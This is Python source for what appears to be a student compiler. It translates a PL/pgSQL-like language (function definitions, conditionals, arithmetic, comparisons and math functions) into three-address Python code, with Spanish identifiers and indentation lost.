def traducir(self):
if not ts.existeF(str(self.id)):
e = errores.CError(0,0,"Error en llamada de funcion, no existe",'Semantico')
errores.insert_error(e)
print('Funcion '+str(self.id) +' no existe')
return '\tprint( \'Funcion '+ str(self.id) + 'no existe\')\n'
c3d = ''
contadorP = 0
for expresion in self.lparams:
trad = expresion.traducir()
c3d += trad[0] +'\n'
c3d += 'pila['+str(contadorP)+'] = ' + str(trad[1]) + '\n'
contadorP +=1
tmp = getTemp()
c3d += self.id+'()'
c3d += '\n'
c3d += tmp +' = pila[10]\n'
return c3d,tmp,0
def c3d():
return '\n'
def ejecutar(self):
pass
class dropfunc(pl):
def __init__(self,ids) -> None:
self.ids = ids
def traducir(self):
c3d = ''
self.ejecutar()
for identificador in self.ids:
c3d += '\tts.deleteFP(str(\''+identificador+'\'))\n'
if not ts.existeF(str(identificador)):
e = errores.CError(0,0,"Error drop funcion, "+str(identificador)+" no existe como funcion",'Semantico')
errores.insert_error(e)
return c3d
def ejecutar(self):
for identificador in self.ids:
if ts.existeF(str(identificador)):
deleteF(str(identificador))
ts.deleteFP(str(identificador))
class createfunc(pl):
def __init__(self,id,lparams,returntype,block):
self.id = id
self.lparams = lparams
self.returntype = returntype
self.block = block
def ejecutar(self):
return 'Se creo la funcion o procedimiento'
def traducir(self):
global cont
if ts.existeF(str(self.id)):
print('Funcion '+str(self.id) +' ya existe')
e = errores.CError(0,0,"Error en llamada creacion de funcion/proceso, ya existe",'Semantico')
errores.insert_error(e)
return '\tprint( \'Funcion '+ str(self.id) + ' ya existe\')\n'
c3d = ''
c3d += '\tn_db = ts.buscarIDTB(NombreDB)\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+self.id+'\',TAS.TIPO.FUNCTION,n_db)\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
ambito = ts.buscarIDTB(NombreDB)
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.FUNCTION,ambito,None, None, None, None, None, None, None ,None,None,None, None,None)
ts.agregar(NuevoSimbolo)
cont += 1
#creo la funcion en ts
funcion = ''
funcion += 'def '+self.id+'():\n'
#variables a usar, guardando en ts y declarando
if self.block.declare != None:
for decla in self.block.declare:
decla.ejecutar()
c3d += decla.c3d()+'\n'
funcion += '\t'+decla.traducir()+'\n'
pcont = 0
for param in self.lparams:
#variables de parametros
if param.alias == None:
#Mira como jalas de las declaraciones
for declara in self.block.declare:
if pcont == declara.tipo:
funcion += '\t'+declara.id+' = pila['+str(pcont)+']\n'
else:
#Solo es para.alias = pilas en el numero
funcion += '\t'+param.alias+' = pila['+str(pcont)+']\n'
param.ejecutar()
pcont += 1
for inst in self.block.instrucciones:
funcion += '\t'+str(inst.traducir()).replace('\n','\n\t')+'\n'
c3d += inst.c3d()
inst.ejecutar()
funciones.append(funcion)
return c3d
def ejecutar1(self):
c3d = ''
c3d += '\tbuscarIDF = buscarIDTB(NombreDB)\n'
c3d += '\tNuevoSimbolo = Simbolo(cont,\''+self.id+'\',TAS.TIPO.FUNCTION,buscarIDF)\n'
c3d += '\tcont+=1\n'
funcion = ''
funcion += 'def '+self.id+'():\n'
#variables a usar, guardando en ts y declarando
for decla in self.block.declare:
c3d += decla.c3d()+'\n'
funcion += '\t'+decla.traducir()+'\n'
for inst in self.block.instrucciones:
funcion += '\t'+inst.traducir()+'\n'
funciones.append(funcion)
return c3d
class param(pl):
def __init__(self,alias,tipo) -> None:
self.alias = alias
self.tipo = tipo
def traducir(self):
c3d = str(self.alias)
return c3d
def ejecutar(self):
global cont
#ambitoDB = ts.buscarIDDB(NombreDB)
ambitoFuncion = ts.buscarIDF()
valor = 'None'
if self.tipo.upper() == 'SMALLINT':
if valor == 'None':
valor = 0
NuevoSimbolo = TAS.Simbolo(cont,self.alias,TAS.TIPO.SMALLINT,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'INTEGER':
if valor == 'None':
valor = 0
NuevoSimbolo = TAS.Simbolo(cont,self.alias,TAS.TIPO.INTEGER,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'BIGINT':
if valor == 'None':
valor = 0
NuevoSimbolo = TAS.Simbolo(cont,self.alias,TAS.TIPO.BIGINT,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'DECIMAL':
if valor == 'None':
valor = 0.0
NuevoSimbolo = TAS.Simbolo(cont,self.alias,TAS.TIPO.DECIMAL,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'NUMERIC':
if valor == 'None':
valor = 0.0
NuevoSimbolo = TAS.Simbolo(cont,self.alias,TAS.TIPO.NUMERIC,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'REAL':
if valor == 'None':
valor = 0.0
NuevoSimbolo = TAS.Simbolo(cont,self.alias,TAS.TIPO.REAL,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'DOUBLE':
if valor == 'None':
valor = 0.0
NuevoSimbolo = TAS.Simbolo(cont,self.alias,TAS.TIPO.DOUBLE,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'PRECISION':
if valor == 'None':
valor = 0.0
NuevoSimbolo = TAS.Simbolo(cont,self.alias,TAS.TIPO.PRECISION,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'CHARACTER':
if valor == 'None':
valor = ''
NuevoSimbolo = TAS.Simbolo(cont,self.alias,TAS.TIPO.CHARACTER,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'CHARACTER_VARYING':
if valor == 'None':
valor = ''
NuevoSimbolo = TAS.Simbolo(cont,self.alias,TAS.TIPO.CHARACTER_VARYING,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'TEXT':
if valor == 'None':
valor = ''
NuevoSimbolo = TAS.Simbolo(cont,self.alias,TAS.TIPO.TEXT,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'TIMESTAMP':
if valor == 'None':
valor = ''
NuevoSimbolo = TAS.Simbolo(cont,self.alias,TAS.TIPO.TIMESTAMP,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor)
ts.agregar(NuevoSimbolo)
cont += 1
class block(pl):
def __init__(self,declare,instrucciones) -> None:
self.instrucciones = instrucciones
self.declare = declare
def traducir(self):
return '\n'
def c3d(self):
return '\n'
def ejecutar(self):
pass
class instruccion():
'clase abstracta'
class raisenotice(instruccion):
def __init__(self,texto,variable) -> None:
self.texto = texto
self.variable = variable
def traducir(self):
c3d = ''
if self.variable == None:
c3d += 'print(\''+self.texto+'\')'
else:
c3d += str(self.variable.exp.traducir()[0])
c3d += 'print(f\''+str(self.texto).replace('%','{'+self.variable.exp.traducir()[1]+'}')+'\')'
def c3d(self):
return '\n'
def ejecutar(self):
pass
class asignacion(instruccion):
def __init__(self,id,exp) -> None:
self.id = id
self.exp = exp
self.traduccion = None
def ejecutar(self):
if self.traduccion == None:
self.traduccion =self.exp.traducir()
#print(self.id,self.traduccion[2])
ts.modificar_valor(self.id,self.traduccion[2])
def c3d(self):
if self.traduccion == None:
self.traduccion =self.exp.traducir()
c3d = ''
#c3d += str(self.exp.traducir()[0])
if isinstance(self.traduccion[2],str):
valor = '\''+str(self.traduccion[2])+'\''
else:
valor = str(self.traduccion[2])
c3d += '\tts.modificar_valor(\''+ str(self.id) + '\', ' + valor +')\n'
return c3d
def traducir(self):
if self.traduccion == None:
self.traduccion =self.exp.traducir()
var = self.traduccion
c3d = ''
c3d += var[0]+ '\n'
obj = self.id + ' = ' + str(var[1]) + '\n'
objopt.append(obj)
c3d += self.id + ' = ' + str(var[1]) + '\n'
return c3d
class rtrn(instruccion):
def __init__(self,exp) -> None:
self.exp = exp
def traducir(self):
c3d = ''
var = self.exp.traducir()
c3d += var[0]
c3d += '\n'
obj = 'pila[10] = ' + var[1] + '\n'
objopt.append(obj)
c3d += 'pila[10] = ' + var[1] + '\n'
return c3d
def c3d(self):
return '\n'
def ejecutar(self):
pass
class searched_case(instruccion):
def __init__(self,condition,instrucciones,elsif,els) -> None:
self.codition = condition
self.instrucciones = instrucciones
self.elsif = elsif
self.els= els
def traducir(self):
c3d = ''
c3d += self.condition.exp.traducir()[0]
#variables temporales a utilizar en else if
#tengo que ejecutar y añadir los elif
for eli in self.elsif :
c3d += str(eli.condition.exp.traducir()[0])
c3d += 'if '+ self.condition.exp.traducir()[1] +':\n'
for inst in self.instrucciones:
c3d += '\t'+inst.traducir()+'\n'
for eli in self.elsif :
#tengo que ejecutar y añadir los elif
c3d += 'elif '+ eli.condition.traducir()[1] +' :'
for inst in eli.instrucciones:
c3d += '\t'+inst.traducir()+'\n'
if els != None:
c3d += 'else:'
for inst in els.instrucciones:
c3d += '\t'+inst.traducir()+'\n'
return c3d
def c3d(self):
c3d = ''
for inst in self.instrucciones:
c3d += inst.c3d()
for eli in self.elsif:
c3d += eli.c3d()
c3d += els.c3d()
return c3d
def ejecutar(self):
pass
class iff(instruccion):
def __init__(self,condition,instrucciones,elsif,els) -> None:
self.condition = condition
self.instrucciones = instrucciones
self.elsif = elsif
self.els= els
def traducir(self):
c3d = ''
varcon = self.condition.traducir()
c3d += varcon[0]+'\n'
#variables temporales a utilizar en else if
#tengo que ejecutar y añadir los elif
aveli = []
for eli in self.elsif :
veli = eli.condition.traducir()
aveli.append(veli)
c3d += veli[0]+'\n'
c3d += 'if '+ varcon[1] +':\n'
obj = 'if '+ varcon[1] +':\n'
objopt.append(obj)
for inst in self.instrucciones:
c3d += '\t'+inst.traducir().replace('\n','\n\t')+'\n'
contadori = 0
for eli in self.elsif :
#tengo que ejecutar y añadir los elif
c3d += 'elif '+ aveli[contadori][1] +' :\n'
obj = 'elif '+ aveli[contadori][1] +' :\n'
objopt.append(obj)
for inst in eli.instrucciones:
c3d += '\t'+inst.traducir().replace('\n','\n\t')+'\n'
contadori += 1
if self.els != None:
c3d += 'else:\n'
objopt.append('else:')
for inst in self.els.instrucciones:
c3d += '\t'+inst.traducir().replace('\n','\n\t')+'\n'
return c3d
def c3d(self):
c3d = ''
for inst in self.instrucciones:
c3d += inst.c3d()
for eli in self.elsif:
c3d += eli.c3d()
if self.els != None:
c3d += self.els.c3d()
return c3d
def ejecutar(self):
pass
class els(instruccion):
def __init__(self,instrucciones) -> None:
self.instrucciones = instrucciones
def traducir(self):
c3d = ''
return c3d
def c3d(self):
c3d = ''
for inst in self.instrucciones:
c3d += inst.c3d()
return c3d
def ejecutar(self):
pass
class elsif(instruccion):
def __init__(self,condition,instrucciones) -> None:
self.condition = condition
self.instrucciones = instrucciones
def traducir(self):
c3d = ''
return c3d
def c3d(self):
c3d = ''
for inst in self.instrucciones:
c3d += inst.c3d()
return c3d
def ejecutar(self):
pass
class expresion():
'Clase abstracta'
tempcont = 0
def getTemp():
global tempcont
tempcont += 1
return 't'+str(tempcont-1)
import OptimizarObjetos as oo
class exp_boolp(expresion):
'Esta expresion devuelve un'
'boolean'
def __init__(self, val):
self.val = val
def traducir(self):
tmp = getTemp()
codigo = tmp + f' = {self.val}'
valor = tmp
res = self.val
obj = oo.Asignacion(tmp,self.val,None,None)
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
def ejecutar(self):
pass
class exp_textp(expresion):
'Devuelve el texto'
def __init__(self, val):
self.val = val
def ejecutar(self):
pass
def traducir(self):
tmp = getTemp()
codigo = tmp + f' = \'{self.val}\''
valor = tmp
res = self.val
obj = oo.Asignacion(tmp,self.val,None,None)
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_nump(expresion):
'Devuelve un número'
def __init__(self, val):
self.val = val
def ejecutar(self):
pass
def traducir(self):
tmp = getTemp()
codigo = tmp + f' = {self.val}'
valor = tmp
res = float(self.val)
obj = oo.Asignacion(tmp,self.val,None,None)
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class expresionC:
'clase abstracta para las operaciones'
class exp_sumap(expresionC):
'Suma las dos expresiones'
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def ejecutar(self):
pass
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} + {tmp2}'
c3df += f'\n{tmpf}'
codigo = c3df
valor = tmp
res = res1 + res2
obj = oo.Asignacion(tmp,tmp1,tmp2,'+')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_restap(expresion):
'Suma las dos expresiones'
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def ejecutar(self):
pass
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} - {tmp2}'
c3df += f'\n{tmpf}'
codigo = c3df
valor = tmp
res = res1 - res2
obj = oo.Asignacion(tmp,tmp1,tmp2,'-')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_multiplicacionp(expresion):
'Multiplica las dos expresiones'
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def ejecutar(self):
pass
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} * {tmp2}'
c3df += f'\n{tmpf}'
codigo = c3df
valor = tmp
res = res1 * res2
obj = oo.Asignacion(tmp,tmp1,tmp2,'*')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_divisionp(expresion):
'Suma las dos expresiones'
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def ejecutar(self):
pass
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} / {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
res = res1 / res2
obj = oo.Asignacion(tmp,tmp1,tmp2,'/')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_idp(expresion):
def __init__(self,val):
self.val = val
def ejecutar(self):
pass
def traducir(self):
tmp = getTemp()
codigo = tmp + f' = {self.val}\n'
valor = tmp
print(ts.getVariable(self.val))
res = ts.getVariable(self.val)
obj = oo.Asignacion(tmp,self.val,None,None)
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_mayorp(expresion):
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def ejecutar(self):
pass
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} > {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
#res = res1 > res2
res = True
obj = oo.Asignacion(tmp,tmp1,tmp2,'>')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_menorp(expresion):
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} < {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
#res = res1 < res2
res = True
obj = oo.Asignacion(tmp,tmp1,tmp2,'<')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_igualp(expresion):
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} == {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
#res = res1 == res2
res = True
obj = oo.Asignacion(tmp,tmp1,tmp2,'==')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_mayor_igualp(expresion):
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} >= {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
#res = res1 >= res2
res = True
obj = oo.Asignacion(tmp,tmp1,tmp2,'>=')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_menor_igualp(expresion):
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} <= {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
#res = res1 <= res2
#True
res = True
obj = oo.Asignacion(tmp,tmp1,tmp2,'<=')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_diferentep(expresion):
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} != {tmp2}'
c3df += f'\n{tmpf} \n'
codigo = c3df
valor = tmp
#res = res1 != res2
res = True
obj = oo.Asignacion(tmp,tmp1,tmp2,'!=')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class inst_procedural(expresion):
def __init__(self,val):
self.val = val
self.lista = []
def c3d(self):
return ''
def traducir(self):
return f'\tsql.execute(\'\'\'{self.val}\'\'\')\n'
def ejecutar(self):
pass
class pl_mathtrig(pl):
'Abstract Class'
class math_absp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
try:
resultado = abs(tr1[2])
except:
resultado = 0
codigo = tr1[0]+'\n'
tmp = getTemp()
codigo += tmp +'=abs('+tr1[1]+')\n'
return codigo,tmp,resultado
class math_cbrtp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.cbrt(tr1[2])
codigo = tr1[0] +'\n'
tmp = getTemp()
codigo += tmp +'=mt.cbrt('+tr1[1]+')\n'
return codigo,tmp,resultado
class math_ceilp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = round(float(tr1[2]))
codigo = tr1[0]+'\n'
tmp = getTemp()
codigo += tmp +'=round(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_degreesp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.degrees(float(tr1[2]))
codigo = tr1[0]
tmp = getTemp()
codigo += tmp +'=mt.degrees(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_divp(pl_mathtrig):
def __init__(self, exp1, exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
resultado = mt.div(float(tr1[2]),float(tr2[2]))
codigo = tr1[0] + '\n'
codigo += tr2[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.div(float('+tr1[1]+'),float('+tr2[1]+'))\n'
return codigo,tmp,resultado
class math_expp(pl_mathtrig):
def __init__(self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.exp(int(tr1[2]))
codigo = tr1[0]+'\n'
tmp = getTemp()
codigo += tmp +'=mt.exp(int('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_factorialp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.factorial(int(tr1[2]))
codigo = tr1[0]+'\n'
tmp = getTemp()
codigo += tmp +'=mt.factorial(int('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_floorp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.floor(float(tr1[2]))
codigo = tr1[0] +'\n'
tmp = getTemp()
codigo += tmp +'=mt.floor(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_gcdp(pl_mathtrig):
def __init__(self, exp1, exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
resultado = mt.gcd(int(tr1[2]),int(tr2[2]))
codigo = tr1[0] + '\n'
codigo += tr2[0]
tmp = getTemp()
codigo += tmp +'=mt.gcd(int('+tr1[1]+'),int('+tr2[1]+'))\n'
return codigo,tmp,resultado
class math_lcmp(pl_mathtrig):
def __init__(self,exp1,exp2,alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
resultado = mt.lcm(int(tr1[2]),int(tr2[2]))
codigo = tr1[0] + '\n'
codigo += tr2[0]
tmp = getTemp()
codigo += tmp +'=mt.lcm(int('+tr1[1]+'),int('+tr2[1]+'))\n'
return codigo,tmp,resultado
class math_lnp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
resultado = mt.ln(float(tr1[2]))
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.ln(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_logp(pl_mathtrig):
def __init__(self, exp1, exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
resultado = mt.log(int(tr1[2]),int(tr2[2]))
codigo = tr1[0] + '\n'
codigo += tr2[0]
tmp = getTemp()
codigo += tmp +'=mt.log(int('+tr1[1]+'),int('+tr2[1]+'))\n'
return codigo,tmp,resultado
class math_log10p(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.log10(float(tr1[2]))
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.log10(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_min_scalep(pl_mathtrig):
def __init__(self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
resultado = mt.min_scale(int(tr1[2]))
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.min_scale(int('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_scalep(pl_mathtrig):
def __init__(self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.scale(str(tr1[2]))
tmp = getTemp()
codigo += tmp +'=mt.scale(str('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_modp(pl_mathtrig):
def __init__(self, exp1,exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
codigo = tr1[0] + '\n'
codigo += t21[0] + '\n'
resultado = mt.mod(float(tr1[2]),float(tr2[2]))
tmp = getTemp()
codigo += tmp +'=mt.mod(float('+tr1[1]+'),float('+tr2[1]+'))\n'
return codigo,tmp,resultado
class math_pip(pl_mathtrig):
def __init__(self, alias):
self.val = mt.pi()
self.alias = alias
def traducir(self):
codigo ='\n'
tmp = getTemp()
codigo += tmp +'= mt.pi()\n'
resultado = mt.pi()
return codigo,tmp,resultado
class math_powerp(pl_mathtrig):
def __init__(self, exp1, exp2, alias):
self.exp1 = exp1
self.exp2 = exp2
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
codigo = tr1[0] + '\n'
codigo += t21[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.power(int('+tr1[1]+'),int('+tr2[1]+'))\n'
resultado = mt.power(int(tr1[2]),int(tr2[2]))
return codigo,tmp,resultado
class math_radiansp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.radians(float(tr1[2]))
tmp = getTemp()
codigo += tmp +'=mt.radians(float('+tr1[1]+'))\n'
return codigo,tmp,resultado
class math_roundp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=round(float('+tr1[1]+'))\n'
resultado = round(float(tr1[2]))
return codigo,tmp,resultado
class math_signp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.sign(float('+tr1[1]+'))\n'
resultado = mt.sign(float(tr1[2]))
return codigo,tmp, resultado
class math_sqrtp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.sqrt(float('+tr1[1]+'))\n'
resultado = mt.sqrt(float(tr1[2]))
return codigo,tmp,resultado
class math_trim_scalep(pl_mathtrig):
def __init__(self,exp,alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.trim_scale(int('+tr1[1]+'))\n'
resultado = mt.trim_scale(int(tr1[2]))
return codigo,tmp,resultado
class math_widthBucketp(pl_mathtrig):
def __init__(self, exp1, exp2, exp3, exp4, alias):
self.exp1 = exp1
self.exp2 = exp2
self.exp3 = exp3
self.exp4 = exp4
self.alias = alias
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
tr3 = self.exp3.traducir()
codigo = tr1[0] + '\n'
codigo += tr2[0] + '\n'
codigo += tr3[0] + '\n'
tmp = getTemp()
codigo += tmp +'=mt.width_bucket(9,8,7,6)\n'
resultado = mt.width_bucket(9,8,7,6)
return codigo,tmp,resultado
class math_truncp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.trunc(float(tr1[2]))
tmp = getTemp()
codigo += tmp +'=mt.trunc(float('+tr1[1]+'))\n'
resultado = mt.trunc(float(tr1[2]))
return codigo,tmp,resultado
class math_randomp(pl_mathtrig):
def __init__(self, alias):
self.alias = alias
def traducir(self):
codigo = '\n'
tmp = getTemp()
codigo += tmp +'= mt.random()\n'
resultado = mt.random()
return codigo,tmp,resultado
class math_setseedp(pl_mathtrig):
def __init__(self,exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
codigo = tr1[0] + '\n'
resultado = mt.setseed(tr1[2])
tmp = getTemp()
codigo += tmp +'= mt.setseed('+tr1[1]+')\n'
return codigo,tmp,resultado
class trig_acosp(pl_mathtrig):
def __init__(self, exp, alias):
self.exp = exp
self.alias = alias
def traducir(self):
tr1 = self.exp.traducir()
